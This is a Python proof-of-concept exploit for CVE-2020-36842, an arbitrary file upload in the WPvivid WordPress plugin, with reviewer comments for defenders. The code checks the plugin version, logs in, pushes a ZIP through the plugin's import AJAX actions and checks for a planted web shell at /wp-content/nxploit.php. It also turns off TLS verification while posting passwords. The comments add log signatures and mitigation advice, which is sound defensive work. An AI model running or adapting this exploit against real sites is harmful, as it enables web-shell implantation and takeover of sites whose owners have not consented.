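"""Proof-of-concept client for CVE-2020-36842 (WPvivid plugin arbitrary file upload).

What the script does, as visible in the code below:

1. GET  <site>/wp-content/plugins/wpvivid-backuprestore/readme.txt  (version probe)
2. POST <site>/wp-login.php with the supplied credentials
3. POST <site>/wp-admin/admin-ajax.php five times, roughly 5 s apart, with
   ``action`` set in turn to ``wpvivid_upload_import_files``,
   ``wpvivid_check_import_file``, ``wpvivid_upload_import_file_complete``,
   ``wpvivid_start_import`` and ``wpvivid_get_import_progress``
4. GET  <site>/wp-content/nxploit.php to see whether a file appeared there

Review notes for defenders:

* Every AJAX request is sent with an ordinary logged-in session and none of
  them carries a nonce field. The CVE is generally described as a missing
  capability check on these import actions; the script itself only shows
  that a valid login is used, not which role is required.
* Detection: the request sequence above is distinctive in web-server logs,
  and the ``files`` value sent with ``wpvivid_upload_import_file_complete``
  is a fixed literal apart from the file name. An unexpected
  ``/wp-content/nxploit.php`` (or any new PHP file directly under
  ``wp-content``) is the artefact this script looks for.
* Mitigation: upgrade the plugin beyond the stable tags named in
  ``check_version`` and review which accounts can log in at all.
* TLS certificate verification is switched off for the whole session and the
  warning is suppressed, so the WordPress password is posted over a
  connection whose peer is not authenticated.
"""
import argparse
import os
import sys
import time

import requests

#by Khaled alenazi Nxploit

# NOTE(review): this silences the InsecureRequestWarning that would otherwise
# point out the unverified TLS connections made below.
requests.packages.urllib3.disable_warnings()

# Disable SSL verification
# NOTE(review): applies to every request of the session, including the
# credential POST in login().
session = requests.Session()
session.verify = False

parser = argparse.ArgumentParser(description="CVE-2020-36842 - WPvivid Plugin Arbitrary File Upload Vulnerability")
parser.add_argument("-u", required=True, help="Target WordPress site URL")
parser.add_argument("-un", required=True, help="WordPress username")
parser.add_argument("-p", required=True, help="WordPress password")
# Arguments are parsed at import time, so importing this module without the
# required options terminates the interpreter via argparse.
args = parser.parse_args()


def check_version(url):
    """Fetch the plugin's readme.txt and stop unless it shows a listed stable tag.

    Args:
        url: Base URL of the WordPress site (no trailing path is added or
            stripped here).

    Exits with status 1 when the tag is not matched or the request fails.
    """
    version_url = url + "/wp-content/plugins/wpvivid-backuprestore/readme.txt"
    try:
        response = session.get(version_url, timeout=10)
        # NOTE(review): these are substring tests. "Stable tag: 0.9.3" already
        # matches "0.9.35" (making the first test redundant) and also any
        # other 0.9.3x tag, while older tags are reported as not vulnerable.
        # readme.txt can also be stale or blocked, so this result is a hint,
        # not an assessment of the installed code.
        if "Stable tag: 0.9.35" in response.text or "Stable tag: 0.9.3" in response.text:
            print("[+] Target is vulnerable. Proceeding with exploitation.")
        else:
            print("[!] Target is not vulnerable.")
            sys.exit(1)
    except requests.RequestException as e:
        print(f"[!] Version check error: {e}")
        sys.exit(1)


def login(url, username, password):
    """Authenticate against wp-login.php using the module-level session.

    Args:
        url: Base URL of the WordPress site.
        username: Value sent as the ``log`` form field.
        password: Value sent as the ``pwd`` form field.

    Success is decided by the presence of a cookie whose name contains
    ``wordpress_logged_in``. Exits with status 1 on HTTP errors or when no
    such cookie is set.
    """
    login_url = url + "/wp-login.php"
    login_data = {
        "log": username,
        "pwd": password,
        "rememberme": "forever",
        "wp-submit": "Log In"
    }
    # The User-Agent is only set on this request; the later requests use the
    # session default.
    headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"}

    try:
        response = session.post(login_url, data=login_data, headers=headers, timeout=10)
        response.raise_for_status()
    except requests.RequestException as e:
        print(f"[!] Login error: {e}")
        sys.exit(1)

    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("[+] Logged in successfully.")
    else:
        print("[!] Login failed.")
        sys.exit(1)


def find_zip_file():
    """Return the first ``.zip`` name that ``os.listdir('.')`` reports.

    ``os.listdir`` gives no ordering guarantee, so with several archives in
    the working directory the choice is arbitrary. Exits with status 1 when
    there is none.
    """
    files_in_dir = [f for f in os.listdir('.') if f.endswith('.zip')]
    if not files_in_dir:
        print("[!] No ZIP file found in the current directory.")
        sys.exit(1)
    return files_in_dir[0]


def send_request(data, files=None, retries=3):
    """POST ``data`` (and optional ``files``) to ``TARGET_URL`` with retries.

    ``TARGET_URL`` is a module global that is only assigned under the
    ``__main__`` guard at the bottom of the file.

    Args:
        data: Form fields for the request body.
        files: Optional multipart file mapping passed through to requests.
        retries: Number of attempts; a 3 s pause follows each failure.

    Returns:
        The response body text, or the literal string
        ``"[!] All attempts failed."`` when every attempt raised.
    """
    for attempt in range(retries):
        try:
            response = session.post(TARGET_URL, data=data, files=files, timeout=10)
            response.raise_for_status()
            return response.text
        except requests.RequestException as e:
            print(f"[!] Request error (Attempt {attempt+1}/{retries}): {e}")
            time.sleep(3)
    return "[!] All attempts failed."


def main():
    """Run the version probe, the login and the five import AJAX calls in order."""
    check_version(args.u)
    login(args.u, args.un, args.p)

    file_path = find_zip_file()
    print(f"[+] Found file: {file_path}")

    # The archive is opened in a context manager so the handle is released
    # once the upload request has been sent (the original never closed it).
    with open(file_path, "rb") as archive:
        files = {"async-upload": (file_path, archive, "application/zip")}
        data = {"name": file_path, "chunk": "0", "chunks": "1", "action": "wpvivid_upload_import_files"}
        print("[+] Uploading file: ", send_request(data, files))
    time.sleep(5)

    check_file_data = {"action": "wpvivid_check_import_file", "file_name": file_path}
    print("[+] Checking file: ", send_request(check_file_data))
    time.sleep(5)

    # Apart from the file name, every value in "files" is a fixed literal
    # (id, sizes, date), so this request body is identical on each run of the
    # script and can serve as a log/WAF signature for it.
    upload_complete_data = {
        "action": "wpvivid_upload_import_file_complete",
        "files": f"[{{\"id\":\"o_1ilg3pu22185h1r7gvmorasib37\",\"name\":\"{file_path}\",\"type\":\"application/zip\",\"size\":2342,\"origSize\":2342,\"loaded\":2342,\"percent\":100,\"status\":5,\"lastModifiedDate\":\"3/4/2025, 3:19:23 AM\"}}]",
    }
    print("[+] Confirming upload: ", send_request(upload_complete_data))
    time.sleep(5)

    start_import_data = {"action": "wpvivid_start_import", "file_name": file_path, "user": "1"}
    print("[+] Starting import: ", send_request(start_import_data))
    time.sleep(5)

    progress_data = {"action": "wpvivid_get_import_progress"}
    print("[+] Import progress: ", send_request(progress_data))

    # Check for shell
    # NOTE(review): only the status code is inspected. A site that answers
    # unknown paths with 200 produces a false positive here, so this is not
    # evidence on its own that a file was written.
    shell_url = args.u + "/wp-content/nxploit.php"
    try:
        response = session.get(shell_url, timeout=10)
        if response.status_code == 200:
            print("[+] Shell uploaded successfully at:", shell_url)
        else:
            print("[!] Shell not found.")
    except requests.RequestException as e:
        print(f"[!] Shell check error: {e}")


if __name__ == "__main__":
    TARGET_URL = args.u + "/wp-admin/admin-ajax.php"
    main()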